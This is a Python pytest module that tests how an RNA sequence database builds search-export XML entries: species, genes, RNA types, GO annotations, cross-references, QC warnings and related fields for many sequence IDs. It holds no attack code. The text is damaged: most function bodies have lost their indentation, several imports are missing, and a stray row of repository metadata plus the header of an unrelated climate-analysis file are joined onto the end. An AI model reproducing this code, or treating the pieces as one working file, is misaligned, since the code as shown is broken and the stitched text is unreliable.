from tests.helpers import run_range_as_single, run_with_replacements
# Parse out all UPIs
# Create temp table of UPI to get metadata for
# Run queries generating all metadata for those UPIs
# Delete UPI table
METADATA = None
META_REPLACEMENTS = {
"crs.sql": (
"WHERE",
"WHERE features.upi || '_' || features.taxid IN ({urs})\nAND",
),
"feedback.sql": (
"FROM rnc_feedback_overlap overlap",
"FROM rnc_feedback_overlap overlap\n WHERE overlap.upi_taxid IN ({urs})",
),
"go_annotations.sql": (
"GROUP BY anno.rna_id",
"WHERE anno.rna_id IN ({urs})\nGROUP BY anno.rna_id",
),
"interacting-proteins.sql": (
"WHERE",
"WHERE related.source_urs_taxid in ({urs})\n AND",
),
"interacting-rnas.sql": (
"WHERE",
"WHERE related.source_urs_taxid in ({urs})\n AND",
),
"secondary-structure.sql": ("WHERE", "WHERE pre.id in ({urs})\n AND"),
}
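# Each entry above splices a URS id filter into the corresponding metadata SQL
# file so that only the sequences referenced in this test module are selected
# (see load_metadata below); this keeps the queries fast and memory-friendly.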
@lru_cache()
def load_metadata():
    # I am using this to parse the test file and pull out all URS ids that are in a
    # test. We then use this list to only extract metadata for the selected
    # sequences. This is much faster and easier on the memory requirements
    # than trying to get all data.
with open(__file__, "r") as raw:
        urs = re.findall(r"URS\w+", raw.read())
print(len(urs))
urs_string = ", ".join("'%s'" % u for u in urs)
metapath = os.path.join("files", "search-export", "metadata")
buf = six.moves.cStringIO()
for filename in os.listdir(metapath):
path = os.path.join(metapath, filename)
raw, replace = META_REPLACEMENTS[filename]
replacements = (raw, replace.format(urs=urs_string))
data = run_with_replacements(path, replacements, take_all=True)
for entry in data:
buf.write(json.dumps(entry))
buf.write("\n")
buf.seek(0)
return exporter.parse_additions(buf)
def load_data(upi):
path = os.path.join("files", "search-export", "query.sql")
entry = run_range_as_single(upi, path)
data = exporter.builder(load_metadata(), entry)
return data
def as_xml_dict(element):
return {"attrib": element.attrib, "text": element.text}
def load_and_findall(upi, selector):
data = load_data(upi)
return [as_xml_dict(d) for d in data.findall(selector)]
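# Convenience helper: pull the <field name="..."> entries out of an entry's
# additional_fields block as attribute/text dicts.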
def load_and_get_additional(upi, field_name):
selector = "./additional_fields/field[@name='%s']" % field_name
return load_and_findall(upi, selector)
def load_and_get_cross_references(upi, db_name):
selector = "./cross_references/ref[@dbname='%s']" % db_name
results = load_and_findall(upi, selector)
assert results
return results
def pretty_xml(data):
ugly = ET.tostring(data)
flattened = ugly.decode()
flattened = flattened.replace("\n", "")
parsed = minidom.parseString(flattened)
return parsed.toprettyxml().lower()
@pytest.mark.parametrize(
"filename", ["data/export/search/" + f for f in os.listdir("data/export/search/")]
)
def test_it_builds_correct_xml_entries(filename):
result = ET.parse(filename)
upi = os.path.basename(filename).replace(".xml", "")
print(pretty_xml(load_data(upi)))
print(pretty_xml(result.getroot()))
assert pretty_xml(load_data(upi)) == pretty_xml(result.getroot())
@pytest.mark.parametrize(
"upi,ans",
[ # pylint: disable=E1101
("URS0000730885_9606", "Homo sapiens"),
("URS00008CC2A4_43179", "Ictidomys tridecemlineatus"),
# ('URS0000713CBE_408172', 'marine metagenome'),
# ('URS000047774B_77133', 'uncultured bacterium'),
],
)
def test_assigns_species_correctly(upi, ans):
"""
Assigns species names correctly.
"""
assert load_and_get_additional(upi, "species") == [
{"attrib": {"name": "species"}, "text": ans}
]
@pytest.mark.skip() # pylint: disable=E1101
def test_assigns_product_correctly(upi, ans):
assert load_data(upi).additional_fields.product == ans
@pytest.mark.parametrize(
"upi,name",
[
("URS0000730885_9606", "human"),
("URS000074C6E6_7227", "fruit fly"),
("URS00003164BE_77133", None),
],
)
def test_assigns_common_name_correctly(upi, name):
ans = []
if name:
ans = [{"attrib": {"name": "common_name"}, "text": name}]
assert load_and_get_additional(upi, "common_name") == ans
@pytest.mark.parametrize(
"upi,function",
[
("URS000000079A_87230", []),
("URS0000044908_2242", ["tRNA-Arg"]),
],
)
def test_assigns_function_correctly(upi, function):
ans = [{"attrib": {"name": "function"}, "text": f} for f in function]
assert load_and_get_additional(upi, "function") == ans
@pytest.mark.parametrize(
"upi,ans",
[
("URS00004A23F2_559292", ["tRNA-Ser-GCT-1-1", "tRNA-Ser-GCT-1-2"]),
("URS0000547AAD_7227", ["EG:EG0002.2"]),
("URS00006DCF2F_387344", ["rrn"]),
("URS00006B19C2_77133", []),
("URS0000D5E5D0_7227", ["FBgn0286039"]),
],
)
def test_assigns_gene_correctly(upi, ans):
assert sorted(d["text"] for d in load_and_get_additional(upi, "gene")) == ans
@pytest.mark.parametrize(
"upi,genes",
[
("URS00006B19C2_77133", set([])),
("URS0000547AAD_7227", {"FBgn0019661", "roX1"}),
("URS0000D5E40F_7227", {"CR46362"}),
(
"URS0000773F8D_7227",
{
"CR46280",
"dme-mir-9384",
r"Dmel\CR46280",
},
),
(
"URS0000602386_7227",
{
"276a",
"CR33584",
"CR33585",
"CR43001",
r"Dmel\CR43001",
"MIR-276",
"MiR-276a",
"dme-miR-276a",
"dme-miR-276a-3p",
"dme-mir-276",
"dme-mir-276a",
"miR-276",
"miR-276a",
"miR-276aS",
"mir-276",
"mir-276aS",
"rosa",
},
),
(
"URS000060F735_9606",
{
"ASMTL-AS",
"ASMTL-AS1",
"ASMTLAS",
"CXYorf2",
# 'ENSG00000236017.2',
# 'ENSG00000236017.3',
# 'ENSG00000236017.8',
"ENSGR0000236017.2",
"NCRNA00105",
"OTTHUMG00000021056.2",
},
),
],
)
def test_assigns_gene_synonym_correctly(upi, genes):
val = {a["text"] for a in load_and_get_additional(upi, "gene_synonym")}
assert val == genes
@pytest.mark.parametrize(
"upi,transcript_ids",
[
("URS0000D5E5D0_7227", {"FBtr0473389"}),
],
)
def test_can_search_using_flybase_transcript_ids(upi, transcript_ids):
val = {c["attrib"]["dbkey"] for c in load_and_get_cross_references(upi, "FLYBASE")}
assert val == transcript_ids
@pytest.mark.parametrize(
"upi,gene,symbol",
[
pytest.param(
"URS000013BC78_4896", "SPSNORNA.29", "sno52", marks=pytest.mark.xfail
),
],
)
def test_can_search_for_pombase_ids(upi, gene, symbol):
val = {x["text"] for x in load_and_get_additional(upi, "gene")}
assert gene in val
val = {x["text"] for x in load_and_get_additional(upi, "gene_synonym")}
assert symbol in val
@pytest.mark.parametrize(
"upi,ans",
[ # pylint: disable=E1101
("URS000047774B_77133", 594),
("URS0000000559_77133", 525),
("URS000000055B_479808", 163),
# ('URS0000000635_283360', 166),
("URS0000000647_77133", 1431),
("URS000087608D_77133", 1378),
("URS0000000658_317513", 119),
("URS0000000651_1005506", 73),
("URS0000000651_1128969", 73),
# ('URS0000000653_502127', 173),
],
)
def test_assigns_length_correctly(upi, ans):
assert load_and_get_additional(upi, "length") == [
{"attrib": {"name": "length"}, "text": str(ans)}
]
@pytest.mark.parametrize(
"upi,ans",
[ # pylint: disable=E1101
("URS00006C4604_1094186", "294dd04c4468af596c2bc963108c94d5"),
("URS00000000A8_77133", "1fe472d874a850b4a6ea11f665531637"),
("URS0000753F51_77133", "c141e8f137bf1060aa10817a1ac30bb1"),
("URS0000000004_77133", "030c78be0f492872b95219d172e0c658"),
# ('URS000000000E_175245', '030ca7ba056f2fb0bd660cacdb95b726'),
("URS00000000CC_29466", "1fe49d2a685ee4ce305685cd597fb64c"),
("URS0000000024_77133", "6bba748d0b52b67d685a7dc4b07908fa"),
# ('URS00006F54ED_10020', 'e1bc9ef45f3953a364b251f65e5dd3bc'), # May no longer have active xrefs
("URS0000000041_199602", "030d4da42d219341ad1d1ab592cf77a2"),
("URS0000000065_77133", "030d80f6335df3316afdb54fc1ba1756"),
],
)
def test_assigns_md5_correctly(upi, ans):
assert load_and_get_additional(upi, "md5") == [
{"attrib": {"name": "md5"}, "text": str(ans)}
]
@pytest.mark.parametrize(
"upi,ans",
[ # pylint: disable=E1101
(
"URS0000062D2A_77133",
"uncultured bacterium partial contains 16S ribosomal RNA, 16S-23S ribosomal RNA intergenic spacer, and 23S ribosomal RNA",
),
("URS00000936FF_9606", "Homo sapiens (human) piR-56608"),
("URS00000C45DB_10090", "Mus musculus (house mouse) piR-101106"),
("URS0000003085_7460", "Apis mellifera (honey bee) ame-miR-279a-3p"),
(
"URS00000C6428_980671",
"Lophanthus lipskyanus partial external transcribed spacer",
),
("URS00007268A2_9483", "Callithrix jacchus microRNA mir-1255"),
(
"URS0000A9662A_10020",
"Dipodomys ordii (Ord's kangaroo rat) misc RNA 7SK RNA (RF00100)",
),
("URS00000F8376_10090", "Mus musculus (house mouse) piR-6392"),
("URS00000F880C_9606", "Homo sapiens (human) partial ncRNA"),
(
"URS00000054D5_6239",
"Caenorhabditis elegans piwi-interacting RNA 21ur-14894",
),
(
"URS0000157781_6239",
"Caenorhabditis elegans piwi-interacting RNA 21ur-13325",
),
("URS0000005F8E_9685", "Felis catus mir-103/107 microRNA precursor"),
("URS000058FFCF_7729", u"Halocynthia roretzi tRNA Gly ÊCU"),
],
)
def test_assigns_description_correctly_to_randomly_chosen_examples(upi, ans):
assert [e["text"] for e in load_and_findall(upi, "./description")] == [ans]
@pytest.mark.parametrize(
"upi,ans",
[ # pylint: disable=E1101
("URS0000409697_3702", "tRNA"),
("URS0000ABD7EF_9606", "rRNA"),
("URS00001E2C22_3702", "rRNA"),
("URS00005F2C2D_4932", "rRNA"),
("URS000019E0CD_9606", "lncRNA"),
("URS00007FD8A3_7227", "lncRNA"),
("URS0000086133_9606", "misc RNA"),
("URS00007A9FDC_6239", "misc RNA"),
("URS000025C52E_9606", "other"),
("URS000075C290_9606", "precursor RNA"),
("URS0000130A6B_3702", "precursor RNA"),
("URS0000734D8F_9606", "snRNA"),
("URS000032B6B6_9606", "snRNA"),
("URS000075EF5D_9606", "snRNA"),
("URS0000569A4A_9606", "snoRNA"),
("URS00008E398A_9606", "snoRNA"),
("URS00006BA413_9606", "snoRNA"),
("URS0000A8F612_9371", "snoRNA"),
("URS000092FF0A_9371", "snoRNA"),
("URS00005D0BAB_9606", "piRNA"),
("URS00002AE808_10090", "miRNA"),
("URS00003054F4_6239", "piRNA"),
("URS00000478B7_9606", "SRP RNA"),
("URS000024083D_9606", "SRP RNA"),
("URS00002963C4_4565", "SRP RNA"),
("URS000040F7EF_4577", "siRNA"),
("URS00000DA486_3702", "other"),
# ('URS00006B14E9_6183', 'hammerhead ribozyme'),
("URS0000808D19_644", "hammerhead ribozyme"),
("URS000080DFDA_32630", "hammerhead ribozyme"),
("URS000086852D_32630", "hammerhead ribozyme"),
("URS00006C670E_30608", "hammerhead ribozyme"),
("URS000045EBF2_9606", "lncRNA"),
("URS0000157BA2_4896", "antisense RNA"),
("URS00002F216C_36329", "antisense RNA"),
("URS000075A336_9606", "miRNA"),
# ('URS0000175007_7227', 'miRNA'),
("URS000015995E_4615", "miRNA"),
("URS0000564CC6_224308", "tmRNA"),
("URS000059EA49_32644", "tmRNA"),
("URS0000764CCC_1415657", "RNase P RNA"),
("URS00005CDD41_352472", "RNase P RNA"),
# ('URS000072A167_10141', 'Y RNA'),
("URS00004A2461_9606", "Y RNA"),
("URS00005CF03F_9606", "Y RNA"),
("URS000021515D_322710", "autocatalytically spliced intron"),
("URS000012DE89_9606", "autocatalytically spliced intron"),
("URS000061DECF_1235461", "autocatalytically spliced intron"),
("URS00006233F9_9606", "ribozyme"),
("URS000080DD33_32630", "ribozyme"),
("URS00006A938C_10090", "ribozyme"),
("URS0000193C7E_9606", "scRNA"),
("URS00004B11CA_223283", "scRNA"),
# ('URS000060C682_9606', 'vault RNA'), # Not active
("URS000064A09E_13616", "vault RNA"),
("URS00003EE18C_9544", "vault RNA"),
("URS000059A8B2_7227", "rasiRNA"),
("URS00000B3045_7227", "guide RNA"),
("URS000082AF7D_5699", "guide RNA"),
("URS000077FBEB_9606", "lncRNA"),
("URS00000101E5_9606", "lncRNA"),
("URS0000A994FE_9606", "other"),
("URS0000714027_9031", "other"),
("URS000065BB41_7955", "other"),
("URS000049E122_9606", "misc RNA"),
("URS000013F331_9606", "RNase P RNA"),
("URS00005EF0FF_4577", "siRNA"),
],
)
def test_assigns_rna_type_correctly(upi, ans):
assert load_and_get_additional(upi, "rna_type") == [
{"attrib": {"name": "rna_type"}, "text": str(ans)}
]
@pytest.mark.parametrize(
"upi,ans",
[ # pylint: disable=E1101
(
"URS00004AFF8D_9544",
[
"ENA",
"RefSeq",
"miRBase",
],
),
("URS00001DA281_9606", ["ENA", "GtRNAdb", "HGNC", "PDBe"]),
],
)
def test_correctly_gets_expert_db(upi, ans):
data = sorted(d["text"] for d in load_and_get_additional(upi, "expert_db"))
assert data == ans
@pytest.mark.parametrize(
"upi,ans",
[ # pylint: disable=E1101
(
"URS00004AFF8D_9544",
{
"MIRLET7G",
"mml-let-7g-5p",
"mml-let-7g",
"let-7g-5p",
"let-7g",
"let-7",
},
),
(
"URS00001F1DA8_9606",
{
"MIR126",
"hsa-miR-126",
"hsa-miR-126-3p",
"miR-126",
"miR-126-3p",
},
),
],
)
def test_correctly_assigns_mirbase_gene_using_product(upi, ans):
data = load_and_get_additional(upi, "gene")
val = set(d["text"] for d in data)
print(val)
print(ans)
assert val == ans
@pytest.mark.skip() # pylint: disable=E1101
def test_correctly_assigns_active(upi, ans):
assert load_data(upi).additional_fields.is_active == ans
# Test that this assigns authors from > 1 publications to a single set
@pytest.mark.skip() # pylint: disable=E1101
def test_assigns_authors_correctly(upi, ans):
assert load_data(upi).additional_fields.authors == ans
@pytest.mark.parametrize(
"upi,ans",
[
# Very slow on test, but ok on production
# ('URS000036D40A_9606', 'mitochondrion'),
("URS00001A9410_109965", "mitochondrion"),
("URS0000257A1C_10090", "plastid"),
("URS00002A6263_3702", "plastid:chloroplast"),
("URS0000476A1C_3702", "plastid:chloroplast"),
],
)
def test_assigns_organelle_correctly(upi, ans):
assert load_and_get_additional(upi, "organelle") == [
{"attrib": {"name": "organelle"}, "text": str(ans)}
]
@pytest.mark.parametrize(
"upi,ans",
[
(
"URS000000079A_87230",
[
{"attrib": {"dbname": "ENA", "dbkey": "AM233399.1"}, "text": None},
{
"attrib": {"dbkey": "87230", "dbname": "ncbi_taxonomy_id"},
"text": None,
},
],
)
],
)
def test_can_assign_correct_cross_references(upi, ans):
data = load_data(upi)
results = data.findall("./cross_references/ref")
assert [as_xml_dict(r) for r in results] == ans
def test_can_create_document_with_unicode():
key = op.itemgetter("text")
val = sorted(load_and_get_additional("URS000009EE82_562", "product"), key=key)
assert val == sorted(
[
{"attrib": {"name": "product"}, "text": u"tRNA-Asp(gtc)"},
{"attrib": {"name": "product"}, "text": u"P-site tRNA Aspartate"},
{"attrib": {"name": "product"}, "text": u"transfer RNA-Asp"},
{"attrib": {"name": "product"}, "text": u"tRNA_Asp_GTC"},
{"attrib": {"name": "product"}, "text": u"tRNA-asp"},
{"attrib": {"name": "product"}, "text": u"tRNA Asp ⊄UC"},
{"attrib": {"name": "product"}, "text": u"tRNA-Asp"},
{"attrib": {"name": "product"}, "text": u"tRNA-Asp-GTC"},
{"attrib": {"name": "product"}, "text": u"ASPARTYL TRNA"},
{"attrib": {"name": "product"}, "text": u"tRNA-Asp (GTC)"},
],
key=key,
)
def test_it_can_handle_a_list_in_ontology():
data = load_data("URS00003B5CA5_559292")
results = data.findall("./cross_references/ref")
xrefs = {as_xml_dict(r)["attrib"]["dbkey"] for r in results}
assert {"ECO:0000202", u"GO:0030533", "SO:0000253"} & xrefs
# @pytest.mark.skip()
# def test_produces_correct_count():
# entries = exporter.range(db(), 1, 100)
# with tempfile.NamedTemporaryFile() as out:
# exporter.write(out, entries)
# out.flush()
# with open(out.name, 'r') as raw:
# parsed = ET.parse(raw)
# count = parsed.find('./entry_count')
# assert count.text == '105'
@pytest.mark.parametrize(
"upi,ans",
[ # pylint: disable=E1101
("URS0000759CF4_9606", 9606),
("URS0000724ACA_7955", 7955),
("URS000015E0AD_10090", 10090),
("URS00005B8078_3702", 3702),
("URS0000669249_6239", 6239),
("URS0000377114_7227", 7227),
("URS000006F31F_559292", 559292),
("URS0000614AD9_4896", 4896),
("URS0000AB68F4_511145", 511145),
("URS0000775421_224308", 224308),
("URS00009C1EFD_9595", None),
("URS0000BC697F_885580", None),
],
)
def test_correctly_assigns_popular_species(upi, ans):
result = []
if ans:
result = [{"attrib": {"name": "popular_species"}, "text": str(ans)}]
assert load_and_get_additional(upi, "popular_species") == result
@pytest.mark.parametrize(
"upi,problems",
[ # pylint: disable=E1101
("URS0000001EB3_9595", ["none"]),
("URS000014C3B0_7227", ["possible_contamination"]),
("URS0000010837_7227", ["incomplete_sequence", "possible_contamination"]),
("URS000052E2E9_289219", ["possible_contamination"]),
("URS00002411EE_10090", ["missing_rfam_match"]),
],
)
def test_it_correctly_build_qc_warnings(upi, problems):
# ans = [{'attrib': {'name': 'qc_warning'}, 'text': p} for p in problems]
val = [a["text"] for a in load_and_get_additional(upi, "qc_warning")]
assert sorted(val) == sorted(problems)
@pytest.mark.parametrize(
"upi,status",
[ # pylint: disable=E1101
("URS0000000006_1317357", False),
("URS000075D95B_9606", False),
("URS00008C5577_77133", False),
("URS0000001EB3_9595", False),
("URS000014C3B0_7227", True),
("URS0000010837_7227", True),
("URS000052E2E9_289219", True),
],
)
def test_it_correctly_assigns_qc_warning_found(upi, status):
assert load_and_get_additional(upi, "qc_warning_found") == [
{"attrib": {"name": "qc_warning_found"}, "text": str(status)},
]
@pytest.mark.parametrize(
"upi,status",
[ # pylint: disable=E1101
# ('URS0000A77400_9606', True),
("URS0000444F9B_559292", True),
("URS0000592212_7227", False),
# ('URS000071F071_7955', True),
# ('URS000071F4D6_7955', True),
("URS000075EAAC_9606", True),
("URS00007F81F8_511145", False),
("URS0000A16E25_198431", False),
("URS0000A7ED87_7955", True),
("URS0000A81C5E_9606", True),
("URS0000ABD87F_9606", True),
("URS0000D47880_3702", True),
],
)
def test_can_correctly_assign_coordinates(upi, status):
assert load_and_get_additional(upi, "has_genomic_coordinates") == [
{"attrib": {"name": "has_genomic_coordinates"}, "text": str(status)},
]
@pytest.mark.parametrize(
"upi",
[ # pylint: disable=E1101
"URS00004B0F34_562",
"URS00000ABFE9_562",
"URS0000049E57_562",
],
)
def test_does_not_produce_empty_rfam_warnings(upi):
assert load_and_get_additional(upi, "qc_warning") == [
{"attrib": {"name": "qc_warning"}, "text": "none"},
]
@pytest.mark.parametrize(
"upi,boost",
[ # pylint: disable=E1101
("URS0000B5D04E_1457030", 1),
("URS0000803319_904691", 1),
("URS00009ADB88_9606", 3),
("URS000049E122_9606", 2.5),
("URS000047450F_1286640", 0.0),
("URS0000143578_77133", 0.5),
("URS000074C6E6_7227", 2),
("URS00007B5259_3702", 2),
("URS00007E35EF_9606", 4),
("URS00003AF3ED_3702", 1.5),
],
)
def test_computes_valid_boost(upi, boost):
assert load_and_get_additional(upi, "boost") == [
{"attrib": {"name": "boost"}, "text": str(boost)}
]
@pytest.mark.parametrize(
"upi,pub_ids",
[ # pylint: disable=E1101
("URS0000BB15D5_9606", [512936, 527789]),
("URS000019E0CD_9606", [238832, 538386, 164929, 491042, 491041]),
],
)
def test_computes_pub_ids(upi, pub_ids):
val = sorted(int(a["text"]) for a in load_and_get_additional(upi, "pub_id"))
assert val == sorted(pub_ids)
@pytest.mark.xfail(reason="Changed how publications are fetched for now")
@pytest.mark.parametrize(
"upi,pmid",
[ # pylint: disable=E1101
("URS000026261D_9606", 27021683),
("URS0000614A9B_9606", 28111633),
],
)
def test_can_add_publications_from_go_annotations(upi, pmid):
val = {c["attrib"]["dbkey"] for c in load_and_get_cross_references(upi, "PUBMED")}
assert str(pmid) in val
@pytest.mark.parametrize(
"upi,qualifier,ans",
[ # pylint: disable=E1101
("URS000026261D_9606", "part_of", ["GO:0005615", "extracellular space"]),
(
"URS0000614A9B_9606",
"involved_in",
[
"GO:0010628",
"GO:0010629",
"GO:0035195",
"GO:0060045",
"positive regulation of gene expression",
"negative regulation of gene expression",
"gene silencing by miRNA",
"positive regulation of cardiac muscle cell proliferation",
],
),
],
)
def test_can_assign_go_annotations(upi, qualifier, ans):
val = {a["text"] for a in load_and_get_additional(upi, qualifier)}
assert sorted(val) == sorted(ans)
@pytest.mark.parametrize(
"upi,has",
[ # pylint: disable=E1101
("URS000026261D_9606", True),
("URS0000614A9B_9606", True),
("URS000019E0CD_9606", False),
("URS0000003085_7460", False),
],
)
def test_it_can_add_valid_annotations_flag(upi, has):
assert load_and_get_additional(upi, "has_go_annotations") == [
{"attrib": {"name": "has_go_annotations"}, "text": str(has)},
]
@pytest.mark.parametrize(
"upi,expected",
[ # pylint: disable=E1101
("URS0000160683_10090", ["BHF-UCL", "MGI"]),
("URS00002075FA_10116", ["BHF-UCL", "GOC"]),
("URS00001FCFC1_559292", ["SGD"]),
("URS0000759CF4_9606", ["Not Available"]),
],
)
def test_adds_field_for_source_of_go_annotations(upi, expected):
data = load_and_get_additional(upi, "go_annotation_source")
assert [d["text"] for d in data] == expected
@pytest.mark.parametrize(
"upi,expected",
[ # pylint: disable=E1101
("URS0000CABCE0_1970608", ["RF00005"]),
("URS0000C9A3EE_384", ["RF02541", "RF00005"]),
],
)
def test_assigns_rfam_ids_to_hits(upi, expected):
data = load_and_get_additional(upi, "rfam_id")
assert sorted(d["text"] for d in data) == sorted(expected)
@pytest.mark.parametrize(
"upi,expected",
[ # pylint: disable=E1101
("URS000020CEC2_9606", True),
("URS000026261D_9606", True),
("URS0000759CF4_9606", False),
("URS0000759CF4_9606", False),
],
)
def test_can_detect_if_has_interacting_proteins(upi, expected):
assert load_and_get_additional(upi, "has_interacting_proteins") == [
{"attrib": {"name": "has_interacting_proteins"}, "text": str(expected)}
]
@pytest.mark.parametrize(
"upi,expected",
[ # pylint: disable=E1101
(
"URS000075E072_9606",
{
"ENSG00000026025",
"ENSG00000074706",
"ENSG00000108064",
"ENSG00000108839",
"ENSG00000124593",
"ENSG00000135334",
"ENSG00000164330",
"ENSG00000174839",
"ENSG00000177189",
"ENSG00000183283",
"ENSG00000197646",
"12S-LOX",
"AFI1A",
"AKIRIN2",
"AL365205.1",
"ALOX12",
"B7-DC",
"Btdc",
"C6orf166",
"CD273",
"CLS",
"COE1",
"DAZAP2",
"DENND6A",
"EBF",
"EBF1",
"FAM116A",
"FLJ10342",
"FLJ34969",
"HU-3",
"IPCEF1",
"KIAA0058",
"KIAA0403",
"MRX19",
"OLF1",
"PD-L2",
"PDCD1LG2",
"PDL2",
"PIP3-E",
"RPS6KA3",
"RSK2",
"TCF6",
"TCF6L2",
"TFAM",
"VIM",
"bA574F11.2",
"dJ486L4.2",
},
),
("URS0000759CF4_9606", set()),
],
)
def test_can_protein_information_for_related_proteins(upi, expected):
data = load_and_get_additional(upi, "interacting_protein")
proteins = set(d["text"] for d in data)
assert proteins == expected
@pytest.mark.parametrize(
"upi,expected",
[ # pylint: disable=E1101
("URS000075E072_9606", {"PAR-CLIP"}),
("URS0000759CF4_9606", set()),
],
)
def test_can_methods_for_interactions(upi, expected):
data = load_and_get_additional(upi, "evidence_for_interaction")
evidence = set(d["text"] for d in data)
assert evidence == expected
@pytest.mark.parametrize(
"upi,flag",
[ # pylint: disable=E1101
("URS00009BEE76_9606", True),
("URS000019E0CD_9606", True),
("URS0000ABD7E8_9606", False),
],
)
def test_knows_has_crs(upi, flag):
data = load_and_get_additional(upi, "has_conserved_structure")
value = [d["text"] for d in data]
assert value == [str(flag)]
@pytest.mark.parametrize(
"upi,crs_ids",
[ # pylint: disable=E1101
(
"URS00009BEE76_9606",
{
"M1412625",
"M2510292",
"M0554312",
"M2543977",
"M2513462",
"M1849371",
"M1849369",
"M0554307",
},
),
("URS0000ABD7E8_9606", set([])),
],
)
def test_assigns_correct_crs_ids(upi, crs_ids):
data = load_and_get_additional(upi, "conserved_structure")
value = {d["text"] for d in data}
assert value == crs_ids
@pytest.mark.parametrize(
"upi,expected",
[ # pylint: disable=E1101
("URS0000A59F5E_7227", set()),
("URS0000014447_7240", {"ENA", "FlyBase", "miRBase", "Rfam"}),
("URS0000ABD7E8_9606", set()),
],
)
def test_assigns_correct_overlaps(upi, expected):
data = load_and_get_additional(upi, "overlaps_with")
value = {d["text"] for d in data}
assert value == expected
@pytest.mark.parametrize(
"upi,expected",
[ # pylint: disable=E1101
(
"URS0000A59F5E_7227",
{
"FlyBase",
"miRBase",
"Modomics",
"PDBe",
"RefSeq",
"Rfam",
"SILVA",
"snOPY",
"SRPDB",
},
),
("URS0000014447_7240", set()),
("URS0000ABD7E8_9606", set()),
],
)
def test_assigns_correct_no_overlaps(upi, expected):
data = load_and_get_additional(upi, "no_overlaps_with")
value = {d["text"] for d in data}
assert value == expected
@pytest.mark.parametrize(
"upi,expected",
[ # pylint: disable=E1101
(
"URS000026261D_9606",
{
"URS00005EB21E_9606",
"URS0000142654_9606",
"URS0000A91D1A_9606",
"URS000029E633_9606",
"URS00001D61C5_9606",
"URS00007D759B_9606",
"URS00002C6CC0_9606",
"URS00008BBA89_9606",
"URS000008C8EB_9606",
"URS0000A887DA_9606",
"URS000002964A_9606",
"URS0000304D5D_9606",
"URS00009C5E9B_9606",
"URS00000F38DD_9606",
"URS0000141778_9606",
"URS000044954E_9606",
"URS0000D61BD6_9606",
"URS0000AA0D63_9606",
"URS000035AC9C_9606",
"URS00007BF182_9606",
"URS000077BE2A_9606",
"URS0000543B4D_9606",
"URS0000D63D56_9606",
"URS00004E64F9_9606",
"URS0000264D7F_9606",
"URS00008C22F5_9606",
"URS00004CDF42_9606",
"URS00001ED6BE_9606",
"URS00002989CF_9606",
"URS000076891D_9606",
"URS00002F49FD_9606",
"URS000017366C_9606",
"URS0000783AD8_9606",
"URS00007716E5_9606",
"URS00004DBD55_9606",
"URS0000499E31_9606",
"URS0000318782_9606",
"URS00001118C6_9606",
"URS000009D1B1_9606",
"URS00000CE0D1_9606",
"URS0000784209_9606",
"URS000040AD32_9606",
"URS00001F136D_9606",
"URS00004942CA_9606",
"URS00001A182D_9606",
"URS00007836D4_9606",
"URS000077EF2F_9606",
"ENSG00000157306",
"ENSG00000177822",
"ENSG00000196756",
"ENSG00000204584",
"ENSG00000206337",
"ENSG00000214106",
"ENSG00000214548",
"ENSG00000225138",
"ENSG00000225733",
"ENSG00000229807",
"ENSG00000231074",
"ENSG00000233937",
"ENSG00000234456",
"ENSG00000235423",
"ENSG00000235499",
"ENSG00000244300",
"ENSG00000245532",
"ENSG00000247556",
"ENSG00000248092",
"ENSG00000249087",
"ENSG00000251209",
"ENSG00000251562",
"ENSG00000253352",
"ENSG00000255108",
"ENSG00000255175",
"ENSG00000255717",
"ENSG00000256732",
"ENSG00000257698",
"ENSG00000260032",
"ENSG00000260276",
"ENSG00000260423",
"ENSG00000261409",
"ENSG00000261428",
"ENSG00000262877",
"ENSG00000266896",
"ENSG00000267078",
"ENSG00000267263",
"ENSG00000267322",
"ENSG00000268027",
"ENSG00000269821",
"ENSG00000270006",
"ENSG00000270066",
"ENSG00000272512",
"ENSG00000272918",
"ENSG00000273001",
"ENSG00000274895",
"ENSG00000275413",
"ENSG00000214297",
"ENSG00000218980",
"ENSG00000219507",
"ENSG00000224631",
"ENSG00000225093",
"ENSG00000225674",
"ENSG00000225972",
"ENSG00000226564",
"ENSG00000226752",
"ENSG00000227081",
"ENSG00000227347",
"ENSG00000227777",
"ENSG00000228232",
"ENSG00000228834",
"ENSG00000229473",
"ENSG00000231752",
"ENSG00000232282",
"ENSG00000232573",
"ENSG00000234975",
"ENSG00000235095",
"ENSG00000237264",
"ENSG00000237350",
"ENSG00000237999",
"ENSG00000239218",
"ENSG00000242294",
"ENSG00000242299",
"ENSG00000243265",
"ENSG00000244535",
"ENSG00000247627",
"ENSG00000256211",
"ENSG00000257199",
"ENSG00000257307",
"ENSG00000257379",
"ENSG00000259751",
"ENSG00000259758",
"ENSG00000261864",
"ENSG00000264772",
"ENSG00000267482",
"ENSG00000269374",
"ENSG00000269378",
"ENSG00000271525",
"ENSG00000272578",
"ENSG00000277358",
"ENSG00000279978",
"ENSG00000142396",
"ENSG00000152117",
"ENSG00000172974",
"ENSG00000175841",
"ENSG00000182310",
"ENSG00000183298",
"ENSG00000188460",
"ENSG00000196204",
"ENSG00000198744",
"ENSG00000204623",
},
),
("URS0000759CF4_9606", set()),
],
)
def test_assigns_correct_interacting_rnas(upi, expected):
data = load_and_get_additional(upi, "interacting_rna")
value = {d["text"] for d in data}
assert value == expected
@pytest.mark.parametrize(
"upi,flag",
[
("URS000047BD19_77133", True),
("URS00005B9F86_77133", True),
("URS0000239F73_77133", True),
("URS0000DF5B98_34613", False),
],
)
def test_knows_if_has_secondary_structure(upi, flag):
assert load_and_get_additional(upi, "has_secondary_structure") == [
{"attrib": {"name": "has_secondary_structure"}, "text": str(flag)}
]
@pytest.mark.parametrize(
"upi,models",
[
("URS000047BD19_77133", ["d.16.b.S.aureus.GEN"]),
("URS00005B9F86_77133", ["d.16.b.S.pneumoniae"]),
("URS0000239F73_77133", ["d.16.b.O.agardhii"]),
("URS0000DF5B98_34613", []),
],
)
def test_sets_valid_model_name(upi, models):
ans = [{"attrib": {"name": "secondary_structure_model"}, "text": m} for m in models]
data = load_and_get_additional(upi, "secondary_structure_model")
assert data == ans
@pytest.mark.parametrize(
"upi,url",
[
(
"URS000075A546_9606",
"http://www.mirbase.org/cgi-bin/mirna_entry.pl?acc=MI0031512",
),
],
)
def test_computes_correct_urls(upi, url):
data = load_and_get_additional(upi, "secondary_structure_model")
expected = [{"attrib": {"name": "url"}, "text": url}]
assert data == expected
| apache-2.0 | 5,211,378,643,536,435,000 | 30.856533 | 134 | 0.542435 | false |
pygeo/pycmbs | pycmbs/icon.py | 1 | 3243 | # -*- coding: utf-8 -*-
"""
This file is part of pyCMBS.
(c) 2012- Alexander Loew
